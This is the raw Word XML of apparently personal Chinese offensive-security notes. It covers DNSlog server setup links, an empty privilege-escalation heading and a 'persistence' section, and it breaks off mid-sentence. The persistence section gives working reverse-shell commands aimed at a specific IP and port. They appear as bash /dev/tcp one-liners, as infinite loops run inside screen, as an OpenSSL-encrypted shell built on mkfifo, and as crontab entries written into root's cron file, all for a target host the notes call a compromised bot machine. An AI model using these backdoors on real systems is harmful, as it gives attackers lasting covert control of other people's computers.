      </w:pPr>
    </w:p>
    <w:p w14:paraId="77447C91" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C7BFAD" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E2E314" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52815D0D" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E47AF79" w14:textId="0E215D7C" w:rsidR="00D660DD" w:rsidRDefault="00D660DD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc159779464"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1B8A0B30" w14:textId="77777777" w:rsidR="00D660DD" w:rsidRDefault="00D660DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2333AECC" w14:textId="7B7BF040" w:rsidR="00323CDF" w:rsidRPr="00D660DD" w:rsidRDefault="00980EC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0426C2E5" w14:textId="3A2056C4" w:rsidR="00D660DD" w:rsidRDefault="00124204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="001C3BE2">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://zhuanlan.zhihu.com/p/218555418</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E567450" w14:textId="6BFD4666" w:rsidR="00124204" w:rsidRPr="00124204" w:rsidRDefault="00124204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00124204">
        <w:t>https://github.com/lanyi1998/DNSlog-GO/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355D97A" w14:textId="6D898DFF" w:rsidR="00D660DD" w:rsidRDefault="00D660DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A576B7" w14:textId="406965AE" w:rsidR="008934F0" w:rsidRDefault="00DC56B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>023-6-19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dnslog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41B86A" w14:textId="4D3B68DA" w:rsidR="00DC56B4" w:rsidRDefault="00DC56B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已有两个域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E92422" w14:textId="24BCEBB0" w:rsidR="008934F0" w:rsidRDefault="00DC56B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC56B4">
        <w:t>https://console.cloud.tencent.com/cns/detail/shenyanjian.site/records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712CC20A" w14:textId="6F7F1968" w:rsidR="00DC56B4" w:rsidRPr="00DC56B4" w:rsidRDefault="00AD34A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD34A4">
        <w:t>https://console.cloud.tencent.com/cns/detail/star-study.cn/records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627788FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A88CA8" w14:textId="2C17914E" w:rsidR="00DC56B4" w:rsidRDefault="00647452" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析后，为什么域名后面会有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA7F340" w14:textId="731E5C39" w:rsidR="00DC56B4" w:rsidRDefault="00647452" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00647452">
        <w:t>https://r2wind.cn/articles/20220908.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB2B983" w14:textId="77777777" w:rsidR="00DC56B4" w:rsidRDefault="00DC56B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12890E34" w14:textId="27626F9B" w:rsidR="003B68A5" w:rsidRDefault="003B68A5" w:rsidP="003B68A5">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DEE319" w14:textId="77777777" w:rsidR="000C733D" w:rsidRDefault="000C733D" w:rsidP="000C733D"/>
    <w:p w14:paraId="42120AF5" w14:textId="77777777" w:rsidR="000C733D" w:rsidRDefault="000C733D" w:rsidP="000C733D"/>
    <w:p w14:paraId="008D2976" w14:textId="77777777" w:rsidR="000C733D" w:rsidRPr="000C733D" w:rsidRDefault="000C733D" w:rsidP="000C733D"/>
    <w:p w14:paraId="687C3445" w14:textId="6223B741" w:rsidR="003B68A5" w:rsidRDefault="000C733D" w:rsidP="000C733D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限维持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199C3F41" w14:textId="77777777" w:rsidR="00A10237" w:rsidRDefault="00A10237" w:rsidP="00A10237">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091AC56B" w14:textId="21176577" w:rsidR="00A10237" w:rsidRDefault="00A10237" w:rsidP="00A10237">
      <w:r w:rsidRPr="00A10237">
        <w:t>https://xz.aliyun.com/t/9488?time__1311=n4%2BxnD0Du0YGq0KYGNnmDUxYwxknit7iKKH4D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5250B6" w14:textId="77777777" w:rsidR="00A10237" w:rsidRPr="00A10237" w:rsidRDefault="00A10237" w:rsidP="00A10237"/>
    <w:p w14:paraId="6CC44D05" w14:textId="13471C89" w:rsidR="003B68A5" w:rsidRDefault="0020215F" w:rsidP="003B68A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc -lvvp 6001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7FF829" w14:textId="1779E9F9" w:rsidR="0020215F" w:rsidRDefault="0020215F" w:rsidP="003B68A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>肉鸡：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B35F83A" w14:textId="0863D284" w:rsidR="003B68A5" w:rsidRDefault="00B6293E" w:rsidP="003B68A5">
      <w:r w:rsidRPr="00B6293E">
        <w:t>/bin/bash -i &gt;&amp; /dev/tcp/192.227.167.113/6001 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3479BE" w14:textId="15E47015" w:rsidR="00980EB2" w:rsidRDefault="00980EB2" w:rsidP="003B68A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bash -i &gt;&amp; /dev/tcp/&lt;ip&gt;/&lt;port&gt; 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14AFF7" w14:textId="77777777" w:rsidR="00B6293E" w:rsidRDefault="00B6293E" w:rsidP="003B68A5"/>
    <w:p w14:paraId="2AF20B94" w14:textId="6959E18C" w:rsidR="00B6293E" w:rsidRDefault="000C733D" w:rsidP="000C733D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180B5A8" w14:textId="03C3F383" w:rsidR="000C733D" w:rsidRDefault="000C733D" w:rsidP="000C733D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>screen -s test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA5A6C7" w14:textId="469A7527" w:rsidR="000C733D" w:rsidRDefault="000C733D" w:rsidP="000C733D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F22087B" w14:textId="21C5C866" w:rsidR="000C733D" w:rsidRDefault="000C733D" w:rsidP="000C733D">
      <w:r>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E39B6A1" w14:textId="0E5EEF60" w:rsidR="000C733D" w:rsidRDefault="000C733D" w:rsidP="000C733D">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00E233D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6293E">
        <w:t>/bin/bash -i &gt;&amp; /dev/tcp/192.227.167.113/6001 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AF7E61" w14:textId="27200080" w:rsidR="00B6293E" w:rsidRDefault="000C733D" w:rsidP="000C733D">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2673CDBC" w14:textId="77777777" w:rsidR="00B6293E" w:rsidRDefault="00B6293E" w:rsidP="003B68A5"/>
    <w:p w14:paraId="66958AAF" w14:textId="77777777" w:rsidR="00AA6E9B" w:rsidRDefault="00AA6E9B" w:rsidP="00AA6E9B">
      <w:r>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F65449" w14:textId="77777777" w:rsidR="00AA6E9B" w:rsidRDefault="00AA6E9B" w:rsidP="00AA6E9B">
      <w:r>
        <w:t xml:space="preserve">    /bin/bash -i &gt;&amp; /dev/tcp/192.227.167.113/6001 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C3FE6" w14:textId="76E43D96" w:rsidR="00AA6E9B" w:rsidRDefault="00AA6E9B" w:rsidP="00AA6E9B">
      <w:r>
        <w:t xml:space="preserve">    sleep </w:t>
      </w:r>
      <w:r w:rsidR="00927E26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88958B" w14:textId="1AFC2A0E" w:rsidR="00AA6E9B" w:rsidRDefault="00AA6E9B" w:rsidP="00AA6E9B">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD4587" w14:textId="77777777" w:rsidR="00247E38" w:rsidRDefault="00247E38" w:rsidP="00AA6E9B"/>
    <w:p w14:paraId="15D777CC" w14:textId="22D4FEFD" w:rsidR="00247E38" w:rsidRDefault="00247E38" w:rsidP="00AA6E9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>openSSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议后门反弹不直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC6A86" w14:textId="77777777" w:rsidR="00247E38" w:rsidRDefault="00247E38" w:rsidP="00247E38">
      <w:r>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F79E3" w14:textId="08909FCB" w:rsidR="00247E38" w:rsidRPr="00247E38" w:rsidRDefault="00247E38" w:rsidP="00247E38">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>mkfifo /tmp/s</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> /bin/sh </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> /tmp/s </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> openssl s_client </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">quiet </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">connect </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>47.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.72:2333</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> /tmp/s</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> rm /tmp/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73BFD3" w14:textId="77777777" w:rsidR="00247E38" w:rsidRDefault="00247E38" w:rsidP="00247E38">
      <w:r>
        <w:t xml:space="preserve">    sleep </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0992CAA3" w14:textId="77777777" w:rsidR="00247E38" w:rsidRDefault="00247E38" w:rsidP="00247E38">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C1C4EB" w14:textId="77777777" w:rsidR="00247E38" w:rsidRDefault="00247E38" w:rsidP="00AA6E9B"/>
    <w:p w14:paraId="23797E29" w14:textId="77777777" w:rsidR="00AA6E9B" w:rsidRDefault="00AA6E9B" w:rsidP="003B68A5"/>
    <w:p w14:paraId="7EA0DCB9" w14:textId="6EFE27FE" w:rsidR="003B68A5" w:rsidRDefault="00A10237" w:rsidP="00A10237">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B90E8C2" w14:textId="7D6A1021" w:rsidR="00A10237" w:rsidRDefault="00A10237" w:rsidP="00A10237">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">* * * * * </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6293E">
        <w:t>/bin/bash -i &gt;&amp; /dev/tcp/192.227.167.113/6001 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBC5BDF" w14:textId="599EF141" w:rsidR="00A10237" w:rsidRDefault="00A10237" w:rsidP="00A10237">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不知道为什么有时候失灵</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CC1DB4" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="00A10237"/>
    <w:p w14:paraId="6DDE45D8" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="00A10237"/>
    <w:p w14:paraId="05D4E232" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>将反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>的命令写入定时任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F64066" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>我们可以在目标主机的定时任务文件中写入一个反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>的脚本，但是前提是我们必须要知道目标主机当前的用户名是哪个。因为我们的反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>命令是要写在</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t> /var/spool/cron/[crontabs]/&lt;username&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>内的，所以必须要知道远程主机当前的用户名。否则就不能生效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1177A6" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>比如，当前用户名为</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>，我们就要将下面内容写入到</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> /var/spool/cron/root </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>(centos</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>系列主机</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5527F90A" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>比如，当前用户名为</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>，我们就要将下面内容写入到</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> /var/spool/cron/crontabs/root </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>(Debian/Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>系列主机</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989D763" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*/1</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">bash </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;&amp;/</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>dev</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/47.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.72/2333</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3818DA3D" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6"/>
    <w:p w14:paraId="2C7937F1" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>每隔一分钟，向</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>47.xxx.xxx.72</w:t>
      </w:r>
